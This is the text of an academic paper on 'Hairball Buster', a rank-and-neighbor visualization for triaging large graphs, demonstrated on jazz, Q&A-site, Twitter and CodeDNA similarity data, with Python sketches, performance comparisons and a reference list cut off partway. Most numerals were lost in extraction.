for instance, using the hb visual for jazz players in figure , the top nodes are all clearly connected to each other (forming a fully connected subgraph), since there is a red dot on the same row and column as the three blue dots representing the eight highest degree nodes on the curve. for example, the highest degree node (rank , degree ) is connected to the second highest ranked node (rank , degree ), indicated by the red dots plotted at rank /degree and rank /degree . this pattern continues with the remainder of the top nodes. this specific kind of connectivity information cannot be determined from a backbone or a histogram display. second, the highest degree jazz players rarely performed with the lowest-degree jazz players, as shown by the gaps in the far side of the upper right quadrant, which increase in frequency and length as the rank increases to the right. this means that the number of lower-ranked musicians with whom the most connected musician performed is small. third, there are few dots near the bottom of the chart. this shows that jazz players who have performed with many others have tended to perform with other jazz players who have also performed with many others, and not with those who have performed with few. in general, the upper-left ‘quadrant’ or section of figure shows which high-degree nodes are mutually connected to other high-degree nodes. if some of the highest degree nodes are not connected with each other, this can indicate that there are different clusters of nodes around some of the high- degree nodes (an observation that can be made without running a clustering algorithm). conversely, if the highest degree nodes are mostly directly connected to each other, this provides a different pattern around a core group to analyze further. in the upper right and lower left quadrants, it is easy to see which high-degree nodes connect with lower-degree nodes and which do not. a high-degree node with many connections to one-degree nodes indicates a common star pattern on traditional graph displays. however, if one finds the highest degree nodes are connected to low-degree nodes rather than each other, then one may have a bipartite graph or other distinguishing feature. the lower right quadrant shows which lower- degree nodes connect with each other. if this area is sparse or empty, then the lower-degree nodes are only connecting with the higher-degree nodes. this is indicative of a star-like shape for some of the high- degree nodes. the visual can also be used to find nodes that are indirectly connected via an intermediate node. if two nodes a and b have a common neighbor c, then c will be depicted as a neighbor node on the same horizontal line above or below each of a and b. figure shows how the hb chart can appear for a directed graph. in this example, we randomly assigned a direction to the jazz player data set, where green indicates an ‘in’ link to the node in that row, while red indicates an ‘out’ link. the jazz player data set consisted of undirected links, and this figure just shows how directed graphs would appear if the links were directed. second application: quickly identifying core groups or multiple groups this section shows how hb can quickly determine whether there is a single core group or multiple core groups in a data set. this example uses toaster figure : questions addressed by location of neighbor nodes. 
hairball buster: a graph triage method for viewing and comparing graphs figure : sample directed neighbors plot for jazz player data set (green = in, red = out). (toster dot ru), which is a russian social media site for software support and help from a community of subject matter experts (smes). it is similar to the popular stackoverflow site, but the toaster data set is smaller and provides a form of ground truth in terms of user-provided tags for purposes of comparison. the toaster data have a set of threaded discussions where a person posts a question, someone else posts an answer (usually an sme), and then others can comment on both the question and the answer. the data set at the time of download had over , nodes, , , edges, and over , discussions. initial work by others at apl examined how to find figure : force-directed representation of the toaster data set. sub-communities within the larger community represented by the toaster data set. see figure for a traditional force-directed visualization of the toaster data set. this image definitely qualifies as a hairball! as shown in figure , the backbone layout did not produce more informative results. to apply the hb approach to this data set, we first removed duplications and focused entirely on whether any username in the data set communicated with any other username in the data set. the analytic question we are asking is ‘who are the core members, and are there any large communities with unique core members?’ while the original data set had , nodes and almost million edges, the de-duped data set had , nodes and , edges. figure shows the hb representation of the nearly , nodes. focusing on the highest-ranked nodes, the top can be readily identified, while the remaining are difficult to visually distinguish. each of the top-ranked nodes appears to connect to all the other high-ranked nodes, and the first obvious visual gaps occur at around , nodes. this indicates that the top-ranked nodes are either fully connected or very nearly fully connected. while displaying the full data set provides the information described above for the first nodes, it does not definitively indicate whether the highest degree nodes are fully connected, or whether they belong to separate clusters due to visual occlusion. to address this limitation, it helps to view the ‘inverse’ of the neighbors – that is, to display the connections figure : backbone layout representation of the toaster data set. figure : hb representation of the toaster data set (directionality ignored). missing links (the gaps), and to zoom in on the top nodes. (zooming in on the display adds no additional computational penalty beyond rendering.) when there are no dots in the inverse, the graph is fully connected. figure shows this inverse display zoomed in on the first nodes. it appears that the top nodes are almost, but not quite, fully connected. figure zooms in further on just the top nodes, again showing the ‘inverse’ neighbors. it is clear that nodes through are fully connected and that nodes through are almost fully connected. hairball buster: a graph triage method for viewing and comparing graphs figure : hb representation of the inverse of neighbor nodes (e.g. gaps). figure : hb inverse representation of just the top ranked nodes with each other in toaster data set. note that zooming in on the inverse neighbors was a simple way to gain a more definitive understanding of the graph while incurring virtually no additional computational cost. 
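the six construction steps listed earlier, together with the 'inverse' check used here to see whether the top-ranked nodes form a complete subgraph, can be sketched in a few lines of python. this is our own minimal rendering for illustration and is not the released hairball-buster code.

from collections import defaultdict
import matplotlib.pyplot as plt

def hb_plot(edges, top_k=10):
    # steps 1 and 4: degree of each node and its neighbor list (order m)
    neighbors = defaultdict(set)
    for u, v in edges:
        neighbors[u].add(v)
        neighbors[v].add(u)
    degree = {n: len(nbrs) for n, nbrs in neighbors.items()}

    # step 2: rank nodes by decreasing degree (order n log n)
    ranked = sorted(degree, key=degree.get, reverse=True)
    rank = {n: i + 1 for i, n in enumerate(ranked)}

    # steps 3, 5, 6: the curve of degree vs. rank, plus one dot per neighbor at the neighbor's degree
    plt.scatter([rank[n] for n in ranked], [degree[n] for n in ranked], c='blue', s=12, label='curve nodes')
    xs, ys = [], []
    for n in ranked:
        for nbr in neighbors[n]:
            xs.append(rank[n])
            ys.append(degree[nbr])
    plt.scatter(xs, ys, c='red', s=4, label='neighbor nodes')
    plt.xlabel('node rank by degree')
    plt.ylabel('degree')
    plt.legend()

    # 'inverse' view of the top-k curve nodes: list the missing links among them
    top = ranked[:top_k]
    missing = [(a, b) for i, a in enumerate(top) for b in top[i + 1:] if b not in neighbors[a]]
    return missing            # an empty list means the top-k nodes are fully connected

edges = [(0, 1), (0, 2), (0, 3), (1, 2), (1, 3), (2, 3), (3, 4), (4, 5)]
print(hb_plot(edges, top_k=4))   # prints [] because the four highest-degree nodes are fully connected
plt.show()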
in summary, using our triage approach based on hb, we can quickly see that the top-ranked smes in the toaster data set have all commented on, or been commented on, by each other, and the top nearly so. this means that there is likely to be just one core group in the toaster community all connected with each other. in contrast, it takes more than one algorithm and manual steps to provide similar data. for example, we ran a histogram on the toaster data set, which connections while k-truss is not available in gephi, it is useful in identifying clusters in data sets. however, when the top nodes are fully or nearly fully connected, the k-truss algorithm will not provide additional useful information about these nodes. third application: hb and temporal graphs a significant benefit of the hb chart approach is that the canonical format allows multiple curves/ graphs to be compared at once. as an example, we divided the toaster data set into blocks of , connections representing approximate slices of the data set over time (since the initial data set was in roughly chronological order). we then compared the hb depictions of the first , node connections with the second and third blocks. figures to show these three batches of nodes and links plotted with the same axis scales for ease of comparison. in figure , there is one node above degree , which is a much higher degree than any of the other nodes. the next highest node is around , followed by a couple at and then a fairly smooth curve toward the lowest degrees. figure shows that in this next time period, the -degree node is the highest-ranked node and the -degree nodes are still present, but there is also an interesting bump in the curve around degree . figure also has a figure : force atlas on top nodes in toaster data set. identified the top to nodes as having the highest degree. we then ran gephi, ranking the nodes by degree and manually copied the top nodes to visualize using force atlas . figure shows the results using degree as the node label. while the process took roughly min, hb provided the results in sec for the initial display and then for the inverse display. the gephi example does show highly connected nodes, but does not conclusively show which are fully connected, and required greater time and calculation cost than hb. figure : hb chart of first , connections in toaster data set. hairball buster: a graph triage method for viewing and comparing graphs figure : hb chart of third , connections in toaster data set. figure : hb chart of second , connections in toaster data set. maximum degree node at , but also one at , , and . this third set of , connections also has a ‘bump’ in the curve around degree that is similar to the bump in figure . in typical node-link visualizations, visualizing changing graphs compounds many of the issues associated with visualizing static graphs. in addition, there are new forms of ‘visual noise’: nodes/edges that are displayed or removed without warning, and nodes/edges that move rapidly from one time period to the next without warning (peterson, ). many approaches have been suggested to address these connections issues, but they are computationally expensive and only work well in limited cases (bender-demoll and mcfarland, ; brandes and corman, ; moody et al., ; peterson, ; zweig, ). in contrast, the hb approach is computationally inexpensive and high in information content. 
hb does not address all of these issues, but allows the analyst to focus on how the centrality of a specific node changes over time, or how the distribution of centrality changes over time. for example, does the shape of the curve change over time? this is shown in figures to for the toaster data set. does the rank of each node change over time? this can be added in a later version of the hb code. see section ‘future features and applications of hb’ for such an approach. fourth application: identifying anomalous features this section describes how hb can be used to quickly identify selected anomalous features in a data set associated with the highest degree nodes, using suspended iranian twitter™ accounts obtained from https://about.twitter.com/en_us/values/elections- integrity.html#data (twitter™, ). this data set for user-id replies with no retweets between nodes included , nodes and , edges. figure was calculated in about sec on a single- threaded laptop, and shows that one node dominated with over , replies. the next two highest nodes had around , replies and just under , replies, respectively. (displaying over , nodes and , links would not be feasible in an adjacency matrix. see section ‘comparing hb to other algorithms’ for comparisons to both the adjacency matrix and blockmodeling.) figure shows how much larger the degree of highest node is compared to all other nodes, as well as for the second and third degree nodes. more importantly, this figure shows an interesting pattern in gaps in the reply pattern of these top nodes, as well as the highest of the next lower- degree-ranked nodes. for example, the highest degree mode appears to connect with most of the rest of the nodes except around nodes ranked at k, while the second highest degree node has multiple gaps and the third highest degree node does not appear to connect with about half the nodes. zooming in on the left-hand side, figure shows the same data limited to the first nodes. note that the three top-ranked nodes connected with each other and many other nodes, but did not connect with the next highest-ranked nodes except in one case. what is the reason for such an unusual pattern? the authors do not know for sure, but it may be that nodes through are bots run by a different team than those running the first three nodes. (of the th through th nodes, the th node communicated with most of the other nodes, but most of the rest of the nodes did not communicate with each figure : hb chart of suspended iranian twitter™ accounts, user-id replies, and no retweets. hairball buster: a graph triage method for viewing and comparing graphs other.) in any case, hb is an efficient way to quickly identify areas of interest and further investigation into anomalous data without having to slowly whittle down a huge hairball display. this approach might also be useful in helping identify other twitter™ bots in the future based on similar patterns. fifth application: quickly identify nodes connected by highest-value link weights this section shows how hb can be used to identify key relationships in graphs with link weights. this example uses output data from a tool called codedna™, a patented malware analysis tool developed at jhu/apl that provides a fast, reliable, automated means for recognizing related malware binaries and linking variants. 
it ‘supports crowd- sourcing of information by providing a robust malware identifier (fingerprint) that is deterministic and repeatable for correlating reports, analyses, and other information about attackers, yet cannot be used to re-create the original malware’ (maughan and carlsten, ). by generating dna-like fingerprints from input files, and computing similarity between these fingerprints, codedna™ can effectively identify clusters of related malware in very large data sets. figure shows some samples of clusters of malware previously produced by codedna™. for purposes of this paper, we obtained a data set based on linux coreutils rather than real malware, and figure : hb chart of suspended iranian twitter™ accounts, user-id replies, no retweets, first nodes showing gaps among the top and the next nodes. processed the data through codedna™ software. figure shows the seven clusters produced by codedna™, where each cluster represents elements of the code that have ‘similarity scores’ between . and . . a similarity score is an output of codedna™ that determines how similar one code binary is to another code binary. in figure , the red lines represent a similarity score of . , meaning the code samples are nearly identical. the blue lines represent the score of . , meaning that roughly % of the code is similar according to codedna’s algorithms. the remaining links between the nodes are shaded between blue and red as the similarity score increases. using . as the lowest similarity score that defines a related cluster, figure shows that the outputs divide into seven clusters. to challenge the hb approach, we selected the cluster that had the most nodes ( ) and the most links ( ). this is almost a fully connected graph, which would have links. figure shows the first attempt at displaying this cluster’s data in hb. the problem is that many of the nodes have exactly the same rank, which makes it difficult to discern how the nodes relate to each other. it would also be useful to color code the similarity scores of each edge to provide further detail about how these nodes relate to each other. the solution is to offset the nodes slightly on the vertical in order to allow for each unique link between nodes to be displayed. in figure , nodes with the same degree are increased or decreased by . so that the monotonically decreasing curve is maintained, connections figure : sample chart of codedna™ cluster outputs of malware binaries. and is centered on the original degree value. (if there are more than nine nodes with the same degree, use a smaller offset to fit them in between the next whole number degree rows.) we added a line to connect the nodes to make it easier to see the curve. in addition to the vertical offset, we further color- coded the similarity values of each link or edge. the following colors represent the different ranges of similarity scores: orange = . to , red = . to . , green = . to . , and purple = . to . . note that nodes through have high similarity scores, and a bit less similarity with nodes , , and , even though they share the same degree. nodes through are figure : sample codedna™ cluster outputs of linux coreutils binaries. also similar to the nodes with degree . likewise, nodes through are similar to each other and to the nodes with degree . figure highlights these areas of high similarity by placing purple boxes around them. hb algorithm is canonical the applications above have illustrated how hairball buster can be used to answer key analytic questions. 
we now move on to a general discussion of the benefits of the approach and how it compares to similar existing techniques. hairball buster: a graph triage method for viewing and comparing graphs figure : sample codedna™ cluster output in standard hairball buster (blue = nodes, gray dots = links). figure : sample codedna™ cluster output in hb with vertical offset. hb is canonical in the sense that each graph has a unique visual representation. this consistency is a significant benefit, allowing different data sets, or different time slices of the same data set as in section ‘third application: hb and temporal graphs,’ to be compared, regardless of size. to ensure uniqueness, the ranking of nodes by degree must be consistent, and this ordering must be chosen at the outset. the simplest way to do this is to assign a unique label to each node and sort them alphanumerically, thus ensuring a canonical display. this was done ‘behind the scenes’ in the above applications. connections another approach is to rank nodes that are tied by having the same degree by their connections to neighbors with the highest rank. for example, all of the one-degree nodes will be ‘tied’ with each other, but a tie-breaker is the degree of the node to which it is connected. if ties still exist after a first pass, then nodes can be ranked by the neighbor’s neighbors. repeat as necessary. if there is still ambiguity between any nodes, simply assign a label to the node and republish the data set so all parties interested in that data set may use the same labels. hb measures of performance many traditional graph layout approaches are computationally intensive because they position each node based on distance relative to every other node and on which nodes share (or are otherwise affected by) links. this n computation means that significant time is required to render a single ‘hairball’ graph with several thousand nodes, and many additional computationally intensive steps may be required to break the hairball into something more readily understandable. in contrast, the hb algorithm has order n log n. for small data sets such as the jazz data set, on a single-threaded laptop there is no noticeable difference in the performance between the two. for large data sets such as the twitter™ data set with over , nodes, however, the difference between n and n log n becomes very significant. table shows experimental results. while the run time is similar for hb and backbone for small data sets, the larger the data set, the better hb performs compared to backbone layout. for k nodes, backbone could not complete in min, whereas hb completed in less than sec. moreover, hb consistently completed for graphs of million nodes in around sec, whereas the backbone algorithm could not be tested because visone could not load this volume of data. the hb approach uses python code to calculate the curves and neighbors from networks defined in standard graphml or csv form. it then creates cartesian plots for the actual visualization. the approach could be probably executed much faster if optimized and parallelized. in hb, every node and neighbor’s location is well defined, easily calculated, and does not change significantly when a new set of nodes or links are added. it does not answer every question, but can identify features that help effectively target what subsets of nodes to use as inputs to more computationally intensive algorithms that do answer deeper questions. 
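as a rough illustration of the bookkeeping behind these cost figures -- not the authors' implementation, and assuming that each neighbor dot is plotted in the column of its node at the height of the neighbor's degree -- the whole construction reduces to one o(n log n) sort plus one o(m) pass over the links:

```python
def hb_plot_data(neighbors):
    """Compute Hairball Buster plot coordinates from an adjacency dict.

    neighbors: dict mapping node label -> set of neighbor labels.
    Returns (curve, dots): curve[i] = (rank, degree) for the node at that rank,
    and dots holds one (rank_of_node, degree_of_neighbor) point per (node,
    neighbor) pair.  Sorting is O(n log n); emitting the dots is O(m).
    """
    degree = {n: len(ns) for n, ns in neighbors.items()}
    # Canonical ranking: degree descending, ties broken lexicographically by label.
    ranked = sorted(neighbors, key=lambda n: (-degree[n], str(n)))
    rank = {n: i + 1 for i, n in enumerate(ranked)}

    curve = [(rank[n], degree[n]) for n in ranked]
    dots = [(rank[n], degree[m]) for n in ranked for m in neighbors[n]]
    return curve, dots
```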
figure : sample codedna™ cluster output in hb with vertical offset and highlighting nodes with highest similarity scores.

table : performance comparisons for hb vs backbone layout. for each data set (file name, file size in bytes, number of nodes, number of edges) the table reports the average hb run time (s) and the average visone run times (s) for the quad-sim and tri-sim backbone variants. the data sets comprise a series of random graphs of increasing size (random-*-nodes.graphml), code-dna.graphml, jazz-directed.graphml, toster_ca_edge.graphml, and iran-tweet-replies.no-retweet.by-userid.graphml. both approaches finish in under a second on the small code-dna and jazz graphs; for the largest random graph, visone could not load the graphml file due to insufficient memory.

hb using other measures of centrality
in addition to degree, hb can also display the rank of the nodes by other centrality measures. these expand the type of questions that can be answered by analysts using hb. we focused on the following measures. the clique count of a node with n neighbors is defined as the count of the (n choose 2) neighbor pairs that are connected. the clique count (order 2) is the number of node pairs within distance two of the node that are connected. the decay centrality of a node i is the weighted sum decay(i) = ∑_{j≠i} δ^{l(i,j)}, where δ is a decay parameter and l(i,j) is the minimum distance from i to j (or infinite if the nodes are in different components). the betweenness centrality of a node measures how likely the node is to lie along the shortest paths between other nodes in the graph. more details on these centrality measures are available in the studies of wasserman and faust ( ) and jackson ( ).
figure shows the hb visual for each of these measures for both the jazz data set and a randomly generated graph. the resulting figures emphasize how a node's centrality measure is related to those of its neighbors. each chart illustrates major structural differences between the jazz graph and a random graph. for example, in the decay centrality figures, the centrality of neighbors in the jazz data sets differs significantly, whereas in the random graph case the decay centrality of neighbors is very similar (note the vertical axis shows values between and only). these examples also show how hb can be applied to floating point as well as integer-valued metrics. (note that some metric calculations, betweenness centrality in particular, are computationally expensive and may negate some of the performance advantages of the hb approach.)

figure : displaying different measures of centrality in hb (degree distribution, degree centrality, clique count, clique count of order 2, decay centrality for a fixed decay parameter, and betweenness centrality) for the jazz data set and a random-edges graph. order 2 means displaying the number of triangles in the subgraph formed from all nodes within two hops of the chosen node; betweenness centrality is expensive to compute, so this version of the plot lacks the benefit of fast computation.

comparing hb to other algorithms
this section describes how hb differs from other commonly used graph analytic and visualization algorithms. table lists analytic questions and features grouped into three sections: (i) understanding node relationships and graph characteristics, (ii) representing large or directed networks or graphs with weighted links, and (iii) the ability to represent other centrality measures and representing graphs in a standard format at low calculation cost. these are used to compare hb with several other techniques: a histogram of node centralities, a standard force-directed layout, a backbone layout, a standard adjacency matrix with nodes sorted by degree, and an adjacency matrix where nodes have been ordered based on clusters (i.e. blockmodeling).
the histogram does not provide information about neighbors, connectivity, number of clusters, weighted links, or directedness. similarly, the adjacency matrix cannot represent centrality measures other than degree, has no visual cues for comparing one node's degree to its neighbors or finding clusters, is not usable for very large data sets, and has no log–log or semi–log representation. (this paper assumes that the adjacency matrix has already been sorted by degree in terms of both rows and columns in order to compare well against hb.) while blockmodeling can depict the number of clusters in a graph, it cannot represent other centrality measures or a log–log or semi–log representation, is not canonical, and requires a large number of calculations. moreover, even when successfully representing clusters, blockmodeling works well only when there are several communities highly connected within blocks and having only sparse connections between blocks. blockmodeling requires at least n calculations, and most references cite n calculations being required (white et al., ; wasserman and faust, ; girvan and newman, ; jackson, ; gopalan et al., ). while force-directed and backbone layout visualizations can show some clustering, they cannot provide the distribution of nodes by degree and the number and identity of highest degree nodes or their direct connectivity to other high-degree nodes except in very small data sets. there are also no visual cues as to how much larger one node's degree is compared to another high-degree node. moreover, they do not represent other measures of centrality, are not canonical, and require at least n calculation cost.

table : comparing hb features to other graph analytic and visualization algorithms.
feature | hairball buster | histogram / node-degree display | force-directed | visone backbone | adjacency matrix | blockmodeling
understanding node relationships and graph characteristics
distribution of nodes by degree | yes | yes | no | no | no (f) | no (f)
quickly determine the number of high-degree nodes | yes | yes | no | no | yes | no (f)
quickly identify which are the highest degree nodes | yes | yes (a) | no (b) | no | yes | yes
determine if the highest degree nodes are directly connected to other high-degree nodes | yes | no | yes (c) | no (b) | yes | yes
determine whether the highest degree nodes are connected to each other indirectly via two hops | yes | no | yes | yes (c) | yes | yes
determine which lower-degree nodes are directly connected to the high-degree nodes | yes | no | yes | yes | yes | yes
provide visual cue of how much difference exists between the degree of the nodes, especially high-degree nodes | yes | yes | no | no | no | yes
determine if there is one central cluster or many clusters that contain the highest degree nodes | yes | no | yes | yes | no | yes
representing large or directed networks, or with weighted links
provide log–log or semi–log representation for very large data sets | yes | yes | no | no | no | no
can visualize both directed and undirected graphs | yes | no | yes (e) | yes (e) | yes | yes
determine which nodes connect to the highest weighted links | yes | no | yes (d) | yes | yes (g) | yes (g)
other centrality measures, standard format, low calculation cost
distribution of nodes by other centrality measures | yes | yes | no | no | no | no
provide a canonical representation of the graph | yes | yes | no | no | yes | no
low calculation cost | yes | yes | no | no | yes | no (h)
notes: (a) if displayed or available via tooltip display; (b) except for very small data sets; (c) for small graphs or when edges are not occluded; (d) in some cases; (e) if link weights displayed, e.g., by color or width; (f) unless one can count the number of nodes or links very carefully; (g) if link weights displayed as attributes of dots in the matrix; (h) order at least n and most references state n.

as shown in table , the only algorithms that come close to the hb analytic triage approach in terms of computation time are the adjacency matrix and the node-degree distribution or histogram display. even then, the histogram cannot address six of the features available in hb, while the adjacency matrix cannot address four. overall, hb efficiently presents information about a graph in a single display that is not available in any other single display. we also compared these approaches visually. figure illustrates five graphs using force-based layout, a histogram, an adjacency matrix, and hb. we have shown in previous sections the variety of questions that can be answered using hb. in contrast, there is little that can be determined directly from the force-based layout except for maybe the preferential attachment graph. while the histogram correlates well with the hb curve, the histogram provides no data whatsoever about the neighbors of the nodes. the adjacency matrix shows little in the way of patterns in these examples, except for the third and fourth graph, although this may be improved by using other node orderings such as those obtained in blockmodeling. an interesting characteristic of hb not previously discussed is also shown in the proximity graph. it is clear from the histogram that the distribution is bimodal, and the adjacency matrix shows a blob in the lower left corner.
hb shows not only the cluster in the upper-left corner where most of the high-degree nodes are interconnected, but also that this cluster is mostly disconnected from other parts of the graph; this could not be discovered from the histogram and is difficult to ascertain from the adjacency matrix.

figure : comparing different types of graphs and algorithms. the jazz, random-edges, watts-strogatz random, proximity, and preferential-attachment graphs are each shown as a force-based layout, a degree distribution, an adjacency matrix, and a neighbor-metric plot (hb).

optional steps of the hb algorithm
section 'hb approach' presented the six basic steps of the hb algorithm. this section describes four optional steps mentioned in the previous use cases:
1. if one requires the hb chart to be canonical, then rank nodes of the same degree in lexicographic ordering based on the node labels.
2. display the inverse (the gaps) of links to the neighbors.
3. display a log–log or semi–log chart.
4. display nodes with the same metric value using vertical offsets.
displaying the inverse is performed at the time the chart is rendered. rather than displaying the neighbor nodes at their specified x and y coordinates, display dots where there is no neighbor node, as shown in figures and . displaying a log–log or semi–log chart benefits from offsetting the origin by , or , depending on the size of the original data set, as described in the appendix. displaying multiple nodes with the same centrality measure using vertical offsets makes relationships easier to see. in this case, select the nodes of the same centrality that are of interest, as shown in figures and . calculate the size of the offset based on the number of curve nodes with the same y coordinate that need to fit within the space . above and . below the y-value.

limitations of hb
at the time of this writing, we have identified four limitations of the hb approach. first, if there are two or more nodes with the same degree (or other centrality measure), even though each node on the curve will have a different rank (x-coordinate), their neighbor nodes may land on top of each other. this reduces the ability of the hb display to allow an analyst to clearly see how the nodes and their neighbors relate to each other, and makes it more difficult to identify which high-degree nodes are connected by two hops. to address this limitation, the hb algorithm and code allows for vertical offsets for nodes that share the same degree, as described in section 'optional steps of the hb algorithm.' note that for most social networks, the high-degree nodes tend not to share the same degree, and when they do, usually only a small number share the same degree. for the low-degree nodes, there is little interest in identifying whether one-degree nodes are sharing the same row. if there is a dot above it, then that one-degree node is connected to that higher-degree node. if there is no dot above it, then that node is connected to another one-degree node, is not connected to the rest of the graph, and is an outlier. the second limitation is that if the graph has multiple links per pair of nodes, as in a multirelational network (zweig, ), then those will not appear on the hb chart. to address this, one could translate the number of links into a link weight and color-code the weights as shown in figures and .
however, if the multiple links each have their own weights, most approaches – including hb, the adjacency matrix, and blockmodeling – would be unable to represent the weights. third, hb is not designed to represent loops, or nodes that connect to themselves. while this is not usually an issue for social network graphs, it is a limitation for the basic hb algorithm. one could apply workarounds, such as a vertical offset if not otherwise being used in this hb case, or one could extend the hb display to a third dimension. fourth, while figure , for example, provides a clear indication of which nodes have the highest degree and whether they are highly connected to other (neighbor) nodes, it can be difficult to identify exactly which of the highest degree nodes are connected to each other due to the large number of nodes being displayed. to solve this display problem, we recommend taking the inverse and displaying the gaps when encountering situations with very large numbers of highly connected nodes, as well as displaying the top % of the highest-ranked nodes. (this requires no new calculations – just selecting the range of top nodes to zoom in on.) figure is an example of applying this solution, and clearly shows how few links are missing from the top nodes to be fully connected. when to use hb given the strengths and limitations of the hb approach, when should an analyst use or not use hb? the authors recommend that hb be used as the initial algorithm to apply to a data set because of its information density and computational efficiency. as a triage method, hb can provide in the first pass the number of highest degree nodes, how they relate to each other, and how they relate to their neighbors. for graphs with large number of nodes that cannot be visually separated in the full hb plot, zooming in on the top nodes provides a computationally inexpensive way to get the same information. the results of this triage can indicate areas of particular interest, such as gaps in the curve or neighbor nodes. moreover, if a graph reference library (see section ‘future features and applications of hb’) is available, the new, unknown data set can be quickly compared to its closest matches of known data sets, thereby suggesting likely underlying structures and algorithms to try next. hb may be less useful for very small graphs, when the structure of the graph is already well-understood, when an analyst already knows exactly what metrics to compute, or, as indicated by the limitations above (section ‘limitations of hb’), when the graph structure connections includes multiple links per node pair or links that loop back to the same node. future features and applications of hb the first planned future feature is to create a graph reference library (grl) to compare new, unknown graphs to a set of graphs whose underlying structure is known. for example, curves generated by exponential random graph models (ergms) will appear different from known social media data curves. once the known curves closest to the unknown curve have been identified, one can also display their neighbors and compare the neighbor distribution to the unknown graph neighbor distribution. this can provide a significant benefit to an analyst by quickly recommending known graphs to consider when analyzing a new graph to better understand its underlying structure. this comparison approach could also be automated or semi- automated by using convolutional neural networks to make these comparisons more thoroughly. 
note that such a broad range of comparisons is possible because the hb representation is canonical. creation of the grl and the ability to display multiple curves on the same chart for purposes of comparison will be addressed in a subsequent paper. one proposed visualization approach is to provide cross-highlighting or ‘brushing’ capabilities among different types of displays. for example, mousing over the hb display could not only provide additional information as tooltips, but by connecting to other display types such as backbone layout, also highlight the same nodes in other displays. this ability to cross- highlight selections in multiple displays would provide particular benefit in the examination of temporal displays, identifying which have changed positions in the curve and which have not. an alternative visualization approach for highlighting similarities and differences in temporal graphs is to highlight which nodes have not changed rank by more than one or two, and so on for a selected number of bands identifying such changes. this method of triage will also help analysts quickly focus on similarities and differences in temporal displays. summary of advantages of hb hairball buster (or node-neighbor centrality) is an approach that provides a computationally efficient approach to graph analytic triage. hb provides a unique, canonical representation of any node-link data set. the ability of hb to provide a standard representation allows different node-link data sets, or different time slices of the same data set, to be compared to identify anomalies or large structural changes. the computational efficiency of hb is on the order of m, where m is the number of links, plus n log n, where n is the number of nodes. because of its computational efficiency, hb can act as a triage method to identify key features of a data set, including whether the curve appears more representative of a social network or a random graph. it can also be used to quickly identify how many high- degree nodes are in the graph, which are the highest ranked nodes, whether those nodes are connected to each other directly or by two hops, and how connected the higher ranked nodes are to the lower-ranked nodes. in addition to degree, hb can visualize graphs using other centrality measures such as clique count, decay centrality, and betweenness. this flexibility of hb to represent a wide range of centrality measures is a significant benefit to analysts. this paper also presented differences between hb and force-directed and backbone layout visualization algorithms. in each case, hb provides greater information density than other algorithms at lower or equal calculation cost. overall, hb presents information about a graph in a single display that is not available in any other single display and can complement the analyst’s existing toolkit. acknowledgments no external funding was used to develop the hairball buster approach and code. the johns hopkins university applied physical laboratory (jhu/apl) funded a small internal research and development seedling project to develop the initial code in python (developed by co-author mark matties) and java (developed by co-author elisha peterson). 
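as a reference point for the centrality measures named in the summary above (clique count, clique count of order 2, decay centrality, betweenness), the sketch below shows how they could be computed with networkx; the decay parameter and the file name are illustrative only, not values from the paper:

```python
from itertools import combinations
import networkx as nx

def clique_count(G, n):
    """Number of connected pairs among the neighbors of n (triangles through n)."""
    nbrs = list(G[n])
    return sum(1 for a, b in combinations(nbrs, 2) if G.has_edge(a, b))

def clique_count_order2(G, n):
    """Triangles in the subgraph induced by all nodes within two hops of n."""
    within_two = nx.single_source_shortest_path_length(G, n, cutoff=2)
    sub = G.subgraph(within_two)
    return sum(nx.triangles(sub).values()) // 3

def decay_centrality(G, i, delta=0.5):
    """decay(i) = sum over j != i of delta ** l(i, j); unreachable nodes contribute 0."""
    lengths = nx.single_source_shortest_path_length(G, i)
    return sum(delta ** l for j, l in lengths.items() if j != i)

# Ranking nodes by any of these measures gives an alternative HB x-axis, e.g.:
# G = nx.read_graphml("jazz-directed.graphml").to_undirected()   # illustrative file name
# ranked = sorted(G, key=lambda n: -decay_centrality(G, n, 0.5))
# btw = nx.betweenness_centrality(G)   # expensive, as noted in the text
```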
the authors would also like to thank the following for providing data sets (cetin savkli for the jazz player data set, matt elder and janis butkevics for the toaster data, bobby seng for the codedna™ data, and mark matties for the iranian twitter™ data), marc johnson for complexity algorithm citations, and roger butler for recognizing that the hb approach was canonical. references bender-demoll, s. and mcfarland, d. a. . the art and science of dynamic network visualization. journal of social structure, . brandes, u. and corman, s. r. . visual unrolling of network evolution and the analysis of hairball buster: a graph triage method for viewing and comparing graphs dynamic discourse. information visualization, ( ): – , available at: https://doi.org/ . /palgrave. ivs. . freeman, l. c. . visualizing social networks. journal of social structure, ( ): , available at: https:// w w w.r e s e a r c h g a te.n e t /p r o fi l e / l i n to n _ fr e e m a n / publication/ _social_network_visualization_ methods_of/links/ bfc ae ac .pdf. fruchterman, t. m. j. and reingold, e. m. . graph drawing by force-directed placement. software: practice and experience, ( ): – , available at: https://doi.org/ . /spe. . ghoniem, m., fekete, j.-d. and castagliola, p. . on the readability of graphs using node-link and matrix- based representations: a controlled experiment and statistical analysis. information visualization, ( ): – , available at: https://doi.org/ . /palgrave.ivs. . girvan, m. and newman, m. e. j. . community structure in social and biological networks. proceedings of the national academy of sciences, ( ): – , available at: https://doi.org/ . /pnas. . gleiser, p. and danon, l. . adv. complex syst. , , available at: http://deim.urv.cat/~alexandre.arenas/ data/welcome.htm as cited on the konect website: http://konect.uni-koblenz.de/networks/arenas-jazz. gleiser, p. m. and danon, l. . community structure in jazz. advances in complex systems ( ): – , available at: https://www.worldscientific. com/doi/abs/ . /s . gopalan, p. k., gerrish, s., freedman, m., blei, d. m. and mimno, d. m. . scalable inference of overlapping communities. in pereira, f., burges, c. j. c., bottou, l. and weinberger, k. q. (eds), advances in neural information processing systems. mit press, cambridge ma, pp. – , available at: http:// papers.nips.cc/paper/ -scalable-inference-of- overlapping-communities.pdf. jackson, m. o. . social and economic networks, princeton university press, princeton and oxford. kamada, t. and kawai, s. . an algorithm for drawing general undirected graphs. information processing letters, ( ): – , available at: https://doi. org/ . / - ( ) - . lehmann, k. a. and kottler, s. . visualizing large and clustered networks. in kaufmann, m. and wagner, d. (eds), graph drawing. springer, berlin and heidelberg, pp. – . maughan, d. and carlsten, n. . transition to practice technology guide. department of homeland security washington dc, available at: https://www. dhs.gov/sites/default /files/publications/csd_t tp_ guide_ _webversion_ _ % final.pdf. moody, j., mcfarland, d. and bender-demoll, s. . dynamic network visualization. american journal of sociology, ( ): – , https://doi. org/ . / . nocaj, a., ortmann, m. and brandes, u. . untangling hairballs. in duncan, c. and symvonis, a. (eds), graph drawing. springer, berlin and heidelberg, pp. – . nocaj, a., 